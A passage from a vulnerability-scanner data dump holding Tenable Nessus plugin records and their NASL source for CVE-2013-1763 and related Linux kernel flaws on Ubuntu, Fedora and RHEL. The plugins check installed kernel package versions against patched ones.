script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1749-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-25-generic\", pkgver:\"3.5.0-25.39~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": "This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-03-04T00:00:00", "title": "Fedora 17 : kernel-3.7.9-104.fc17 (2013-3106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-04T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-3106.NASL", "href": "https://www.tenable.com/plugins/nessus/64985", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3106.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64985);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"FEDORA\", value:\"2013-3106\");\n\n script_name(english:\"Fedora 17 : kernel-3.7.9-104.fc17 (2013-3106)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=915052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/099482.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1f94bb6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"kernel-3.7.9-104.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": "This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-02-27T00:00:00", "title": "Fedora 18 : kernel-3.7.9-205.fc18 (2013-3086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-27T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:kernel"], "id": "FEDORA_2013-3086.NASL", "href": "https://www.tenable.com/plugins/nessus/64901", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3086.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64901);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"FEDORA\", value:\"2013-3086\");\n\n script_name(english:\"Fedora 18 : kernel-3.7.9-205.fc18 (2013-3086)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=915052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e92895\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"kernel-3.7.9-205.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2013-02-27T00:00:00", "title": "Ubuntu 12.10 : linux vulnerabilities (USN-1750-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1750-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64910", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1750-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64910);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"USN\", value:\"1750-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerabilities (USN-1750-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1750-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1750-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-25-generic\", pkgver:\"3.5.0-25.39\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-25-highbank\", pkgver:\"3.5.0-25.39\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:08", "description": "Updated kernel-rt packages that fix several security issues and three\nbugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was\nwoken due to a SIGKILL signal instead of being stopped. A local,\nunprivileged user could use this flaw to escalate their privileges.\n(CVE-2013-0871, Important)\n\n* An out-of-bounds access flaw was found in the way\nSOCK_DIAG_BY_FAMILY Netlink messages were processed in the Linux\nkernel. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2013-1763, Important)\n\n* It was found that the default SCSI command filter does not\naccommodate commands that overlap across device classes. A privileged\nguest user could potentially use this flaw to write arbitrary data to\na LUN that is passed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in\nthe Linux kernel processed payload-less socket buffers (skb) when the\nMSG_PEEK option was requested. A local, unprivileged user could use\nthis flaw to cause a denial of service (infinite loop).\n(CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs :\n\n* There was high contention on run-queue lock when load balancing\nbefore idling, causing latency spikes on high CPU core count systems.\nWith this update, IPI is used to send notification to cores with\npending work, and the cores push the work rather than trying to pull\nit, resolving this issue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock\nhas been converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after\na timeout, not set back to running. Such a device would not come back\nonline after a fast_io_fail or timeout. With this update, an explicit\ncheck for the device being offline has been added, and the device is\nset back to running when re-initializing, allowing devices to recover\nafter a failure or timeout. (BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these\nissues. The system must be rebooted for this update to take effect.", "edition": 26, "published": "2014-07-22T00:00:00", "title": "RHEL 6 : MRG (RHSA-2013:0622)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0871", "CVE-2013-0268", "CVE-2013-1763", "CVE-2013-0290", "CVE-2012-4542"], "modified": "2014-07-22T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "p-cpe:/a:redhat:enterprise_linux:mrg-rt-release", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2013-0622.NASL", "href": "https://www.tenable.com/plugins/nessus/76659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0622. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76659);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-4542\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0871\", \"CVE-2013-1763\");\n script_bugtraq_id(57838, 57964, 57986, 58088, 58137);\n script_xref(name:\"RHSA\", value:\"2013:0622\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2013:0622)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix several security issues and three\nbugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was\nwoken due to a SIGKILL signal instead of being stopped. A local,\nunprivileged user could use this flaw to escalate their privileges.\n(CVE-2013-0871, Important)\n\n* An out-of-bounds access flaw was found in the way\nSOCK_DIAG_BY_FAMILY Netlink messages were processed in the Linux\nkernel. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2013-1763, Important)\n\n* It was found that the default SCSI command filter does not\naccommodate commands that overlap across device classes. A privileged\nguest user could potentially use this flaw to write arbitrary data to\na LUN that is passed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in\nthe Linux kernel processed payload-less socket buffers (skb) when the\nMSG_PEEK option was requested. A local, unprivileged user could use\nthis flaw to cause a denial of service (infinite loop).\n(CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs :\n\n* There was high contention on run-queue lock when load balancing\nbefore idling, causing latency spikes on high CPU core count systems.\nWith this update, IPI is used to send notification to cores with\npending work, and the cores push the work rather than trying to pull\nit, resolving this issue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock\nhas been converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after\na timeout, not set back to running. Such a device would not come back\nonline after a fast_io_fail or timeout. With this update, an explicit\ncheck for the device being offline has been added, and the device is\nset back to running when re-initializing, allowing devices to recover\nafter a failure or timeout. (BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these\nissues. The system must be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-4542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0268\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", 